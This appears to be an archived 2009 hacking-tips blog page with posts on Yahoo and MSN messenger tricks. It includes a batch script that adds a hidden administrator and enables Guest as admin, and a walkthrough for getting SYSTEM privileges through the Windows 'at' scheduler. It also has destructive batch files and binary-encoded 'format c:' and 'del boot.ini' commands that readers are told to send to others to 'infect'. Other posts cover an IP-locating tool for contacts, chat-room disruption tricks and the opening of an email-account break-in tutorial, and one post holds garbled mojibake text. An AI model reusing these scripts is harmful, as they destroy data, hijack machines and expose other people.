Your Ad Here

Firefox Beta

Showing posts with label Yahoo Tutorials And Tips Tricks. Show all posts
Showing posts with label Yahoo Tutorials And Tips Tricks. Show all posts

Saturday, June 27, 2009

how to deactive a hotmail account ??

Just follow these steps:
1. Open following link:

Delete MSN, Hotmail or other Windows Live Account

http://login.live.com/login.srf?wa=w...4855&mkt=en-US

2. Enter your mail ID and password and it'll show following page:
This image has been resized.Click to view original image

3. Click on "Close account" button.
4. Your account will be reserved for 270 days so that if you want to re-activate it, you can do within 270 days. After 270 days it'll be deleted permanently and you'll not be able to re-activate it.

Read more...

IPGeter v1.50 For Msn Script!

Vote: Please Link: vote if you like this plugin.

IPGet

Version: 1.50
Author: CoolDuDe_i06
Update Date: June 23, 2007
Release Date: July 31, 2006

----------------------------------------------------------------
What is IPGet
----------------------------------------------------------------

IPGet is a script for Msg Plus! Live
(Messenger Plus! Live - The Windows Live Messenger Extension). IPGet allows you to
find out the ip addresses of your Windows Live
Messenger contacts. Whenever a direct connection,
such as a File Transfer or MSN Games, is launched,
IPGet will alert you with the remote IP address and
the email of the person it belongs to. IPGet can also
pinpoint the location of this IP address telling you
its city, state, and country of origin.

Additionally, you can check all the IP connections
in use by Windows Live Messenger in the "IPGet -
IP Connections" Window.

----------------------------------------------------------------
How to use IPGet
----------------------------------------------------------------
To obtain an IP Address of a contact, just
establish a direct connection such as a File
Transfer or a MSN Game. Click on the popup to
obtain the location of the detected IP address.

Already established IP connection can be
displayed in the "IPGet - IP Connections"
window. Here IP Connections can be filtered
and stored for easier sorting.

----------------------------------------------------------------
Commands for IPGet
----------------------------------------------------------------

/ipget

Display the IP Connections window


/iplocate

Locate the origin of given IP address


/iplog

Display past events related to IPGet,
useful for viewing missed popups


/ipconfig

Display the settings window


/ipabout

Display the about window


/iphelp

Display the readme file


/ipupdate

Checks for newer versions of IPGet


/ipshare

Share IPGet with your contacts

----------------------------------------------------------------
Change Log
----------------------------------------------------------------

------ 1.50 ----------------------------------------------------

- MAJOR UPDATE
- Rewrote IP detection mechanism to work with new MSN protocol
- Added method to detect the person the IP belongs to
- Fixed "IP Connections" Window not working in Vista
- Added "Locator" feature to find the origin of ip addresses
- Added "Log" feature to lookup missed popups
- Added option to stop sound playback on automatic detection
- Added option to select an interface to monitor
- Fixed "Kill" option in "IP Connections" Window not working

------ 1.11 ----------------------------------------------------

- Fixed update mechanism


------ 1.10 ----------------------------------------------------

- Fixed IP Connections window not working in Windows XP Home



----------------------------------------------------------------
FAQ's
----------------------------------------------------------------

1. IPGet loads fine but does not detect IP's during file transfer

Ans. Make sure that the correct interface is selected under "Interfaces" in Settings window. Try restarting MSN after first installing the script.

2. Why does IPGet randomly popup IP addresses even though no direct connect is established

Ans. This is because MSN protocol establishes a direct connection to transfer things such as Display Picture, etc. in the background. An easy way to get the IP Address of most of the contacts on your list without even a file transfer is to change your display pic to something new and restart MSN/WLM.

3. Why do I get a "Direct connection cannot be established." error in the starting

Ans. This error means that WinPCap packet tracer does not support your OS or your NIC. Disable the direct detection feature in the "Settings" window of IPGet and use the manual "IP Connections" window to find IP addresses.

---------------------------------------------------
Screenshots
---------------------------------------------------

This image has been resized.Click to view original image

CLick Here To Live Short



This image has been resized.Click to view original image

Read more...

Invisible nick in chat

Invisible nickname in chat room

WANT TO HIDE TO SOMEONE IN THE CHATROOM
THEN FOLLOW THESE STEP....

1. login to YM
2. click log in, then click "My account info"
3. re-enter ur password the Account info window will come out
4. look Member information then click the link EDIT
5. scroll down and find general information
6. click the blue link " preffered content" Yahoo U.S.
7. choose "Yahoo china" on drop down menu
8. click finished
9. in new window, scroll down then click the left button which is the accept TOS
You'll be back again in Account information window
10. click the blue link ( on right side of window ) under your screen name
11. then choose which Sn you want to be in invisible ( click the third link on right )
12. click the upper link which is ur edit profile
13. then put this " ÃÃâ€*’Ãâ€Â*â€â⠀žÂ ¢ÃƒÆ’ƒÂ¢Ã¢â€šÂà ‚ ¬ÃƒÆ’…¡ÃÃâ€*’Ãà ‚ ¢ÃƒÂ¢Ã¢â‚¬Å¡Ã‚¬Ã…¡Ãƒâ€Š¡Ã ƒÆ’‚¡ÃÃâ€*’Ãà ¢â‚¬ Â*’ââࢠ€šÂ¬Ã…¡ÃƆ™Ã ƒâ€*’‚à Į ’‚¡ÃƆ™Ãƒâ €*’Ãâ€Â*’ÃÆ ’à ‚¢Ã¢â€šÂ¬Ãâ⠂¬Â¦ ¡ÃÃâ€*’âââ₠¬Å¡ ¬Å¡Ãƒâ€šÃ†šÃ ‚¡ÃƒÃâ€*’Ãâ€Â*ââ ‚ ¬Ã¢â€žÂ¢ÃƒÆ’ƒÂ¢Ã¢â€š à ƒâ€šÃ‚¬Ãƒâ€¦Ã‚¡ÃƒÃâ€*â₠¬â„¢ ‚Ãââ ‚ ¬Å¡Ãƒâ€šÃ‚¡ÃƒÃâ€*’ à ƒâ€Â*’âà ƒÆ’à ‚¢Ã¢â‚¬Å¡Ã‚¬Ã…ÂÂ Â¡ÃƒÆ ’Æ’Ãâ€*’â€Ã⠀¦Ã‚ ¡ÃƒÆ’Ã†â€™ÃƒÂ¢Ã¢â€šÂ¬Ã…Â¡ÃƒÆ’Ã¢â‚¬Å¡Ãƒâ€šÃ‚Â¡ÃƒÆ ’à †â€™Ãƒâ€*’Ãâ€Â*â€℠¢ÃƒÆ’ ƒÂ¢Ã¢â€šÂ¬ à …¡ ÃÃâ€*’â€Ã … ¡Ãƒâ€šÃ‚ ¡Ã ƒÆ’Ãâ€*’Ãâ€Â*â€â†žÂ¢Ã ƒÆ’ƒÂ¢Ã¢â€šÂà ‚ˆ ƒÆ’…¡ÃÃâ€*’Ãà ‚¢à ƒÂ¢Ã¢â‚¬Å¡Ã‚¬Ã…¡Ãƒâ€Š¡ÃƒÆ ’‚¡ÃÃâ€*’Ãâ €Â* ’ââà¢Ã¢ ‚¬Å¡Ã‚¬Ã…¡ÃƆ™Ãƒâ €*Ã¢â‚¬â„¢ÃƒÆ’Ã‚Â¢ÃƒÂ¢Ã¢â‚¬Å¡Ã‚Â¬Ãƒâ€¦Ã‚Â¡ÃƒÆ ’Ɔ™ÃƒÂ¢Ã¢â€šÂ¬Ã…¡Ãƒâ€šÃ‚¡Ãƒ Ãâ€* ’Ãâ€Â*’Ãà †šÃ‚¢ÃƒÂ¢Ã¢â‚¬Å¡Ã‚¬Ã†¦Ã ‚¡ÃƒÃâ€*’â↚ ¬Ã…¡Ãƒâ€šÃ‚Ã⠀ šÃ‚¡ÃƒÆ’Ãâ€*’Ãâ€Â*â↚¬à ¢â€žÂ¢ÃƒÆ’ƒÂ¢Ã¢â€š Ã⠀šÃ‚¬Ãƒâ€¦Ã‚¡ÃƒÃâ€*†™Ã ƒÂ¢Ã¢â€šÂ¬Ã…¡Ãƒââ⠀šÂ¬ šÃ‚¡ÃÃâ€*’ à â€Â*Չ̈ ‚ ¢ÃƒÂ¢Ã¢â€šÂ¬Ã…Â¡Ãƒâ€šÃ‚Â¬ÃƒÆ’Ã¢â‚¬Â¦Ãƒâ€šÃ‚Â¡ÃƒÆ ’à †â€™Ãƒâ€*Չہ ¡à ƒÆ’Ã†â€™ÃƒÂ¢Ã¢â€šÂ¬Ã…Â¡ÃƒÆ’Ã¢â‚¬Å¡Ãƒâ€šÃ‚Â¡ÃƒÆ ’Æ⠀™Ãƒâ€*’ Ãâ€Â*’â ÃƒÆ ’¢â€šÂ¬Ã… ¡à ƒÆ’Æ’Ãâ€*’â€Ã …à ‚¡ÃƒÆ’‚ÂÂÂ Â¡ÃƒÆ ’Æ’Ãâ€*’Ãâ€Â*â€â†žÂ¢Ãƒ ƒÆ’¢â‚ ¬Ã ƒâ€¦Ã‚¡ÃƒÃâ€*’à¢Ã ¢â€šÂ¬Ã…¡Ãƒâ€šÃ ‚¡ÃÃâ€*’Æ*à ƒÂ¢Ã¢â€šÂ¬Ã¢â€žÂ¢ÃƒÆ’ƒÂ¢Ã¢à¢Ã¢â €šÂ¬Ã…¡Ã‚¬Ã…¡ÃƆ™Ãƒâ€ *’‚ÃƆ™ ‚¡ÃÃ⠀*à ¢â‚¬â„¢ÃƒÆ’â€Â*’Ãà ‚ ¢Ã¢â€šÂ¬Ã†¦Ãƒâ €šÃ‚¡ÃƒÆ’Ãâ€*’â↚ ¬Ãƒâ€¦Ã‚¡ÃƒÆ’‚ÂÃ⠀š ¡ÃƒÃâ€*’Ãâ€Â*ââ‚ ‰ „¢ÃƒÆ’¢â‚ ƚ¬Ã…¡ÃÃâ€*â€℠¢ÃƒÆ ’¢â‚¬Å¡Ãƒââ⠀šÂ¬Ã …¡Ãƒâ€šÃ‚¡ÃƒÃâ€*’ Ãà ¢â‚¬Â*Չ̈ ‚¢ ÃƒÂ¢Ã¢â€šÂ¬Ã…Â¡Ãƒâ€šÃ‚Â¬ÃƒÆ’Ã¢â‚¬Â¦Ãƒâ€šÃ‚Â¡ÃƒÆ ’Æ ’Ãâ€*’ ‚Ãââ ‚ ¬Å¡Ãƒâ€šÃ‚¡ÃƒÃâ€*’ à ƒâ€Â*’âà ƒÆ’à ‚¢Ã¢â‚¬Å¡Ã‚¬Ã…ÂÂ Â¡ÃƒÆ ’Æ’Ãâ€*’â€Ã⠀¦Ã‚ ¡ÃƒÆ’Ã†â€™ÃƒÂ¢Ã¢â€šÂ¬Ã…Â¡ÃƒÆ’Ã¢â‚¬Å¡Ãƒâ€šÃ‚Â¡ÃƒÆ ’à †â€™Ãƒâ€*’Ãâ€Â*â€℠¢ÃƒÆ’ ƒÂ¢Ã¢â€šÂ¬ à …¡ÃÃâ€*’âà ¢ ‚¬Å¡Ãƒâ€šÃ â €šÃ‚¡ÃƒÃâ€*’Æ*à¢Ã¢â€šÂ¬Ã¢â€žÂ¢ÃƒÆ’ƒÂ¢Ã¢â↚ ¬Å¡Ã‚¬Ã…¡ÃÆ*à ¢â‚¬â„¢ÃƒÆ’¢â‚¬Å¡ÃƆ™Ãƒ ¢â‚¬Å¡Ãƒâ€šÃ‚¡ÃƒÃâ€*â⠂¬â„¢ÃƒÆ’â€Â*’Ãà ‚ ¢ÃƒÂ¢Ã¢â‚¬Å¡Ã‚¬Ã…Æš ¡ÃƒÃâ€*’ââ‚à ‚ˆ ƒâ€¦Ã‚¡ÃƒÆ’‚ÂÃ⠀šÃ‚ ¡ " on second box or saying nickname
14. scroll down and click the small box
15. then click the bottom button on right side
you are now again in edit profile window
16. click the bottom button which is the OK
17. click the log out link ( far right of the window )
18. then click exit ( you need to exit for this to work )
19. click again the lg in button on YM and click log out
20. Now wait 5 sec and re-enter again, and you have now the invisible nickname.a

Read more...

Unbootable S.Vox Trick

unbootable S.Vox Trick



open ur s.vox
1>ymsg protocol version>u can see>ymsg,16,15,14,thn>yhttp
choose>yhttp
2>domination method.
u can see 1>make it 2
3>dominate
make it>95/150
4>voice login style
make >ycht
now u can join room 100%unbootble
ENJOY!

Read more...

: MAKE YOUR OWN @KIMO.COM ID new.gif EXPLOIT YAHOO ID


Link Here

Read more...

Monday, June 22, 2009

How to use Xtreme Voice All Version

Hello guys,

This is the video of Xtreme Voice how to run and details about error, will post more later.



Read more...

Yahoo Tweak for getting tabs in IM window


Feature which makes it unique from the traditional yahoo messenger i.e tabbed IM windows as shown in the picture.In the present version, one more IM window opens for every conversation you do.But in the next version all the conversations will be done as tabs in a single window just like as it happens in Gaim , instead of messing up your taskbar with different windows.This tab feature is also present in Yahoo messenger 8.You can just use this feature by downloading the following registry hacks.First one is to on the feature and the second one is to turn it off.
Yahoo messenger 8 IM window tab on registry patch
Yahoo messenger 8 IM window tab off registry patch

After downloading the files,run the tabbed_im_on.reg file.It will ask something like this "Are you sure you want to add the information to the registry??" click on yes and it will say information added to registry.For turning the hack off,run the second file and do the same above procedure.

The problems with the tabbed feature is that it won't show any notification if there are new messages in the newly opened tabs.it wont show in which tab the new message has arrived.It even won't update the title of the IM window when you navigate through different tabs.wackyb has got a hack which corrects the problems.
Download the wackyb update for Yahoo messenger hack

Note:Use at your risk.


if you like my p0st.. click the thanks button or add some rep

Read more...

Thursday, June 11, 2009

Important Tutorials About De-active

Hi Friendz

My Tutorial Today About Un.De-active

And This Simplest Way

Note - U must Have Master

@rogers.com
@nl.rogers.com
@verizon.net


Will Take The Rogers Now

*- Go To (( Member Centre Home ))

*- Click On (( My Account & Billing ))

*- Click On (( Create New Secondary Account ))


*- Your Browser Will Open This Page (( ROGERS TERMS OF SERVICE ))

*- Select (( I accept ))


*- Your Browser Will Open This Page (( Secondary Account Creation))

* When You Select (( Yes )) This Page Will Open Two Option


*- Now Write The Required Data And Click Next

* Click ReturnTo Member Centre

*- Congratulations Your Id Now Un De-active

Read more...

++YAHOO MESSENGER COMPLETELY UNBOOTABLE++

A very nice tutorial on how yahoo messenger completely unbootable. You must have a profiler and multi-yahoo messenger.

Read more...

Tuesday, June 9, 2009

Hack admin from xp guest account(Thats possible )

Well thats possible ..
Please Dont missuse This Post . Its meant for "Educational Purpose" only or for helping those who have lost their PASSWORD.
HaCk "GUEST" with Admin privileges........


echo off
title Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0




Copy this to notepad and save the file as "Guest2admin.bat"
then u can double click the file to execute or run in the cmd.
it works...


~ Cheers ~



* Haking "admin" from "user" mode n more



really that is possible !

u know why is it a "user" account because it lacks come service layer than that in "administrator" account

Using simple command line tools on a machine running Windows XP we will obtain system level privileges, and run the entire explorer process (Desktop), and all processes that run from it have system privileges. The system run level is higher than administrator, and has full control of the operating system and it’s kernel. On many machines this can be exploited even with the guest account. At the time I’m publishing this, I have been unable to find any other mention of people running an entire desktop as system, although I have seen some articles regarding the SYSTEM command prompt.

Local privilege escalation is useful on any system that a hacker may compromise; the system account allows for several other things that aren’t normally possible (like resetting the administrator password).

The Local System account is used by the Windows OS to control various aspects of the system (kernel, services, etc); the account shows up as SYSTEM in the Task Manager

Local System differs from an Administrator account in that it has full control of the operating system, similar to root on a *nix machine. Most System processes are required by the operating system, and cannot be closed, even by an Administrator account; attempting to close them will result in a error message. The following quote from Wikipedia explains this in a easy to understand way:


You can trick the system into running a program, script, or batch file with system level privileges.

One sample

One trick is to use a vulnerability in Windows long filename support.
Try placing an executable named Program.*, in the root directory of the "Windows" drive. Then reboot. The system may run the Program.*, with system level privileges. So long as one of the applications in the "Program Files" directory is a startup app. The call to "Program Files", will be intercepted by Program.*.

Microsoft eventually caught on to that trick. Now days, more and more, of the startup applications are being coded to use limited privileges.


Quote:

In Windows NT and later systems derived from it (Windows 2000, Windows XP, Windows Server 2003 and Windows Vista), there may or may not be a superuser. By default, there is a superuser named Administrator, although it is not an exact analogue of the Unix root superuser account. Administrator does not have all the privileges of root because some superuser privileges are assigned to the Local System account in Windows NT.


Under normal circumstances, a user cannot run code as System, only the operating system itself has this ability, but by using the command line, we will trick Windows into running our desktop as System, along with all applications that are started from within.
Getting SYSTEM
I will now walk you through the process of obtaining SYSTEM privileges.
To start, lets open up a command prompt (Start > Run > cmd > [ENTER]).
At the prompt, enter the following command, then press [ENTER]:
Code:
at

If it responds with an “access denied” error, then we are out of luck, and you’ll have to try another method of privilege escalation; if it responds with “There are no entries in the list” (or sometimes with multiple entries already in the list) then we are good. Access to the at command varies, on some installations of Windows, even the Guest account can access it, on others it’s limited to Administrator accounts. If you can use the at command, enter the following commands, then press [ENTER]:

Code:
at 15:25 /interactive “cmd.exe”

Lets break down the preceding code. The “at” told the machine to run the at command, everything after that are the operators for the command, the important thing here, is to change the time (24 hour format) to one minute after the time currently set on your computers clock, for example: If your computer’s clock says it’s 4:30pm, convert this to 24 hour format (16:30) then use 16:31 as the time in the command. If you issue the at command again with no operators, then you should see something similar to this:

When the system clock reaches the time you set, then a new command prompt will magically run. The difference is that this one is running with system privileges (because it was started by the task scheduler service, which runs under the Local System account). It should look like this:

You’ll notice that the title bar has changed from cmd.exe to svchost.exe (which is short for Service Host). Now that we have our system command prompt, you may close the old one. Run Task Manager by either pressing CTRL+ALT+DELETE or typing taskmgr at the command prompt. In task manager, go to the processes tab, and kill explorer.exe; your desktop and all open folders should disappear, but the system command prompt should still be there.
At the system command prompt, enter in the following:

Code:
explorer.exe



A desktop will come back up, but what this? It isn’t your desktop. Go to the start menu and look at the user name, it should say “SYSTEM”. Also open up task manager again, and you’ll notice that explorer.exe is now running as SYSTEM. The easiest way to get back into your own desktop, is to log out and then log back in. The following 2 screenshots show my results (click to zoom):

System user name on start menu


explorer.exe running under SYSTEM

What to do now
Now that we have SYSTEM access, everything that we run from our explorer process will have it too, browsers, games, etc. You also have the ability to reset the administrators password, and kill other processes owned by SYSTEM. You can do anything on the machine, the equivalent of root; You are now God of the Windows machine. I’ll leave the rest up to your imagination.





ADMINISTRATOR IN WELCOME SCREEN.


When you install Windows XP an Administrator Account is created (you are asked to supply an administrator password), but the "Welcome Screen" does not give you the option to log on as Administrator unless you boot up in Safe Mode.
First you must ensure that the Administrator Account is enabled:
1 open Control Panel
2 open Administrative Tools
3 open Local Security Policy
4 expand Local Policies
5 click on Security Options
6 ensure that Accounts: Administrator account status is enabled Then follow the instructions from the "Win2000 Logon Screen Tweak" ie.
1 open Control Panel
2 open User Accounts
3 click Change the way users log on or log off
4 untick Use the Welcome Screen
5 click Apply Options
You will now be able to log on to Windows XP as Administrator in Normal Mode.


EASY WAY TO ADD THE ADMINISTRATOR USER TO THE WELCOME SCREEN.!!


Start the Registry Editor Go to:
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Winlogon \ SpecialAccounts \ UserList \
Right-click an empty space in the right pane and select New > DWORD Value Name the new value Administrator. Double-click this new value, and enter 1 as it's Value data. Close the registry editor and restart.

Enjoy And Good Luck

By Starry Night

Read more...

making yavox domination work for other chat clients

http://img517.imageshack.us/img517/7359/yavox1aw4.png
http://img209.imageshack.us/img209/8320/yavox3yo2.png
http://img389.imageshack.us/img389/6113/yavox2xw1.png
http://i39.tinypic.com/e7nk07.jpg

Here is a simple way of using yavox domination in other chat clients, I tested in yazak, yhook, ytklite, svox and chat admin and it works and has better dominance compare with vc guard or power mic (on my test). First you have to have these tools;
1. yavox domination (1,3 or 4)
2. vc guard (the blue one not the beta version)

1. First open vc guard and select the client you want to protect.

2. open yavox domination.exe, activate domination (For yhook users please change the value 100 in the yavox domination to 200 so that you wont get an error.)

3.Login your client and join a room and open voice. (Notice that the vc guard icon does not change to green thats ok, coz yavox doimination is working you will see the number of voice users in the format (ex.12/12).

4.Now check if you have good dominace. If you had, please don't forget to press the thanks button.

here are some screen shots, notice that I was using different versions of yavox domination:

Read more...

Sunday, May 31, 2009

Format a HDD with notepad

Step 1.
Copy The Following In Notepad Exactly as it says


01001011000111110010010101010101010000011111100000

Step 2.
Save As An EXE Any Name Will Do

Step 3.
Send the EXE to People And Infect

OR

IF u think u cannot format c driver when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives this is simple binary code
format c:\ /Q/X -- this will format your drive c:\

01100110011011110111001001101101011000010111010000 100000011000110011101001011100

0010000000101111010100010010111101011000


format d:\ /Q/X -- this will format your dirve d:\

01100110011011110111001001101101011000010111010000 100000011001000011101001011100

0010000000101111010100010010111101011000


format a:\ /Q/X -- this will format your drive a:\


01100110011011110111001001101101011000010111010000 100000011000010011101001011100

0010000000101111010100010010111101011000


del /F/S/Q c:\boot.ini -- this will cause your computer not to boot.


01100100011001010110110000100000001011110100011000 101111010100110010111101010001

00100000011000110011101001011100011000100110111101 101111011101000010111001101001

0110111001101001

try to figure out urself rest
cant spoonfeed
its workin

Do not try it on ur PC. dont mess around this is for educational purpose only

still if u cant figure it out try dis

go to notepad

@Echo off
Del C:\ *.*|y

save it as Dell.bat

worse

@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00

and save it as a .bat file

Read more...

Yahoo! 9 Bug For Using Symbol IDs

That's So Easy
For example You Have This ID ~> MySimpeID:-p

Open Yahoo Messenger 9:d
and Write Your Yahoo ID with symbols Like this: ^^^MySimpeID~!@#$%
and Write Password
Then Just Press [ Sign In ] Button and enjoy :-)
You Can Use All Of Symbols In Character Map
Remember You Must Have Yahoo Messenger 9a
__________________

Read more...

Saturday, May 30, 2009

NetBios Basic Tutorial

I bet u wanna try ur hands on Ethical Hacking but unaware of Basic NetBios, which stands as a very important aspect. n dis is d best explanation i can offer u, written in much simpler language.
~cheers~


Preface to NetBIOS

Before you begin reading this section, understand that this section was written for the novice to the concept of NetBIOS, but - it also contains information the veteran might find educational. I am prefacing this so that I do not get e-mail like "Why did you start your NetBIOS section off so basic?" - Simple, its written for people that may be coming from an enviroment that does not use NetBIOS, so they would need me to start with basics, thanks.

Whats is NetBIOS?

NetBIOS (Network Basic Input/Output System) was originally developed by IBM and Sytek as an Application Programming Interface (API) for client software to access LAN resources. Since its creation, NetBIOS has become the basis for many other networking applications. In its strictest sense, NetBIOS is an interface specification for accessing networking services.

NetBIOS, a layer of software developed to link a network operating system with specific hardware, was originally designed as THE network controller for IBM's Network LAN. NetBIOS has now been extended to allow programs written using the NetBIOS interface to operate on the IBM token ring architecture. NetBIOS has since been adopted as an industry standard and now, it is common to refer to NetBIOS-compatible LANs.

It offers network applications a set of "hooks" to carry out inter-application communication and data transfer. In a basic sense, NetBIOS allows applications to talk to the network. Its intention is to isolate application programs from any type of hardware dependancies. It also spares software developers the task of developing network error recovery and low level message addressing or routing. The use of the NetBIOS interface does alot of this work for them.

NetBIOS standardizes the interface between applications and a LANs operating capabilities. With this, it can be specified to which levels of the OSI model the application can write to, making the application transportable to other networks. In a NetBIOS LAN environment, computers are known on the system by a name. Each computer on the network has a permanent name that is programmed in various different ways. These names will be discussed in more detail below.

PC's on a NetBIOS LAN communicate either by establishing a session or by using NetBIOS datagram or broadcast methods. Sessions allow for a larger message to be sent and handle error detection and correction. The communication is on a one-to-one basis. Datagram and broadcast methods allow one computer to communicate with several other computers at the same time, but are limited in message size. There is no error detection or correction using these datagram or broadcast methods. However, datagram communication allows for communication without having to establish a session.

All communication in these environments are presented to NetBIOS in a format called Network Control Blocks (NCB). The allocation of these blocks in memory is dependant on the user program. These NCB's are divided into fields, these are reserved for input and output respectively.

NetBIOS is a very common protocol used in todays environments. NetBIOS is supported on Ethernet, TokenRing, and IBM PC Networks. In its original induction, it was defined as only an interface between the application and the network adapter. Since then, transport like functions have been added to NetBIOS, making it more functional over time.

In NetBIOS, connection (TCP) oriented and connectionless (UDP) communication are both supported. It supports both broadcasts and multicasting and supports three distinct services: Naming, Session, and Datagram.

NetBIOS Names

NetBIOS names are used to identify resources on a network. Applications use these names to start and end sessions. You can configure a single machine with multiple applications, each of which has a unique NetBIOS name. Each PC that supports an application also has a NetBIOS station name that is user defined or that NetBIOS derives by internal means.

NetBIOS can consist of up to 16 alphanumeric characters. The combination of characters must be unique within the entire source routing network. Before a PC that uses NetBIOS can fully function on a network, that PC must register their NetBIOS name.

When a client becomes active, the client advertises their name. A client is considered to be registered when it can successfully advertise itself without any other client claiming it has the same name. The steps of the registration process is as follows:

1. Upon boot up, the client broadcasts itself and its NetBIOS information anywhere from 6 to 10 to ensure every other client on the network receives the information.

2. If another client on the network already has the name, that NetBIOS client issues its own broadcast to indicate that the name is in use. The client who is trying to register the already in use name, stop all attempts to register that name.

3. If no other client on the network objects to the name registration, the client will finish the registration process.

There are two types of names in a NetBIOS enviroment: Unique and Group. A unique name must be unique across the network. A group name does not have to be unique and all processes that have a given group name belong to the group. Each NetBIOS node maintains a table of all names currently owned by that node.

The NetBIOS naming convention allows for 16 characters in a NetBIOS name. Microsoft, however, limits these names to 15 characters and uses the 16th character as a NetBIOS suffix. A NetBIOS suffix is used by Microsoft Networking software to indentify the functionality installed or the registered device or service.

[QuickNote: SMB and NBT (NetBIOS over TCP/IP work very closely together and both use ports 137, 138, 139. Port 137 is NetBIOS name UDP. Port 138 is NetBIOS datagram UDP. Port 139 is NetBIOS session TCP. For further information on NetBIOS, read the paper at the rhino9 website listed above]

The following is a table of NetBIOS suffixes currently used by Microsoft WindowsNT. These suffixes are displayed in hexadecimal format.

Name Number Type Usage
================================================== ========================
00 U Workstation Service
01 U Messenger Service
<\\_MSBROWSE_> 01 G Master Browser
03 U Messenger Service
06 U RAS Server Service
1F U NetDDE Service
20 U File Server Service
21 U RAS Client Service
22 U Exchange Interchange
23 U Exchange Store
24 U Exchange Directory
30 U Modem Sharing Server Service
31 U Modem Sharing Client Service
43 U SMS Client Remote Control
44 U SMS Admin Remote Control Tool
45 U SMS Client Remote Chat
46 U SMS Client Remote Transfer
4C U DEC Pathworks TCPIP Service
52 U DEC Pathworks TCPIP Service
87 U Exchange MTA
6A U Exchange IMC
BE U Network Monitor Agent
BF U Network Monitor Apps
03 U Messenger Service
00 G Domain Name
1B U Domain Master Browser
1C G Domain Controllers
1D U Master Browser
1E G Browser Service Elections
1C G Internet Information Server
00 U Internet Information Server
[2B] U Lotus Notes Server
IRISMULTICAST [2F] G Lotus Notes
IRISNAMESERVER [33] G Lotus Notes
Forte_$ND800ZA [20] U DCA Irmalan Gateway Service

Unique (U): The name may have only one IP address assigned to it. On a network device, multiple occurrences of a single name may appear to be registered, but the suffix will be unique, making the entire name unique.

Group (G): A normal group; the single name may exist with many IP addresses.

Multihomed (M): The name is unique, but due to multiple network interfaces on the same computer, this configuration is necessary to permit the registration. Maximum number of addresses is 25.

Internet Group (I): This is a special configuration of the group name used to manage WinNT domain names.

Domain Name (D): New in NT 4.0

For a quick and dirty look at a servers registered NetBIOS names and services, issue the following NBTSTAT command:

nbtstat -A [ipaddress]
nbtstat -a [host]

NetBIOS Sessions

The NetBIOS session service provides a connection-oriented, reliable, full-duplex message service to a user process. NetBIOS requires one process to be the client and the other to be the server. NetBIOS session establishment requires a preordained cooperation between the two stations. One application must have issued a Listen command when another application issues a Call command. The Listen command references a name in its NetBIOS name table (or WINS server), and also the remote name an application must use to qualify as a session partner. If the receiver (listener) is not already listening, the Call will be unsuccessful. If the call is successful, each application receives notification of session establishment with the session-id. The Send and Receive commands the transfer data. At the end of a session, either application can issue a Hang-Up command. There is no real flow control for the session service because it is assumed a LAN is fast enough to carry the required traffic.

NetBIOS Datagrams

Datagrams can be sent to a specific name, sent to all members of a group, or broadcast to the entire LAN. As with other datagram services, the NetBIOS datagrams are connectionless and unreliable. The Send_Datagram command requires the caller to specify the name of the destination. If the destination is a group name, then every member of the group receives the datagram. The caller of the Receive_Datagram command must specify the local name for which it wants to receive datagrams. The Receive_Datagram command also returns the name of the sender, in addition to the actual datagram data. If NetBIOS receives a datagram, but there are no Receive_Datagram commands pending, then the datagram is discarded.

The Send_Broadcast_Datagram command sends the message to every NetBIOS system on the local network. When a broadcast datagram is received by a NetBIOS node, every process that has issued a Receive_Broadcast_Datagram command receives the datagram. If none of these commands are outstanding when the broadcast datagram is received, the datagram is discarded.

NetBIOS enables an application to establish a session with another device and lets the network redirector and transaction protocols pass a request to and from another machine. NetBIOS does not actually manipulate the data. The NetBIOS specification defines an interface to the network protocol used to reach those services, not the protocol itself. Historically, has been paired with a network protocol called NetBEUI (network extended user interface). The association of the interface and the protocol has sometimes caused confusion, but the two are different.

Network protocols always provide at least one method for locating and connecting to a particular service on a network. This is usually accomplished by converting a node or service name to a network address (name resolution). NetBIOS service names must be resolved to an IP address before connections can be established with TCP/IP. Most NetBIOS implementations for TCP/IP accomplish name address resolution by using either broadcast or LMHOSTS files. In a Microsoft enviroment, you would probably also use a NetBIOS Namer Server known as WINS.

NetBEUI Explained

NetBEUI is an enhanced version of the NetBIOS protocol used by network operating systems. It formalizes the transport frame that was never standardized in NetBIOS and adds additional functions. The transport layer driver frequently used by Microsofts LAN Manager. NetBEUI implements the OSI LLC2 protocol. NetBEUI is the original PC networking protocol and interface designed by IBM for the LanManger Server. This protocol was later adopted by Microsoft for their networking products. It specifies the way that higher level software sends and receives messages over the NetBIOS frame protocol. This protocol runs over the standard 802.2 data-link protocol layer.

NetBIOS Scopes

A NetBIOS Scope ID provides an extended naming service for the NetBIOS over TCP/IP (Known as NBT) module. The primary purpose of a NetBIOS scope ID is to isolate NetBIOS traffic on a single network to only those nodes with the same NetBIOS scope ID. The NetBIOS scope ID is a character string that is appended to the NetBIOS name. The NetBIOS scope ID on two hosts must match, or the two hosts will not be able to communicate. The NetBIOS Scope ID also allows computers to use the same computer namee as they have different scope IDs. The Scope ID becomes a part of the NetBIOS name, making the name unique.

Read more...

How to Break Into Email Accounts

I do not endorse Hacking !
This is meant for educational purpose only !
I want u to know how others can try break into your Personal life !
Beware !!

This is a Genuine Article.
Will try to add in as much as possible
keep posting !
comment on this article !

Introduction


I have written this tutorial to address a question that is all too commonly asked in any channel/chat room with "hack" in the title (asked in frequency to the point of harrassment really). So since this is a question that so many people ask, then I believe that there should at least be an answer available (regardless of the morality or "lameness" of such a question). So you as the reader are most likely reading this because you want to break into somebody's email account.


Well, you must understand that there is no 1-2-3 process to anything. I will give you options to consider when persuing such a task, but it will ultimately be up to you to do this. This is what you want to do, and no matter what sort of offers you throw up at anybody, nobody is going to do this for you. There is no program that is going to do all this for you. Also don't forget that nobody is going to hold your hand and lead you through this. I'm offering you as the reader suggestions for ways you can address this task, and that is about all the help you are going to get from anybody. So now that I've made all that clear, let's begin...

Things You Should Know


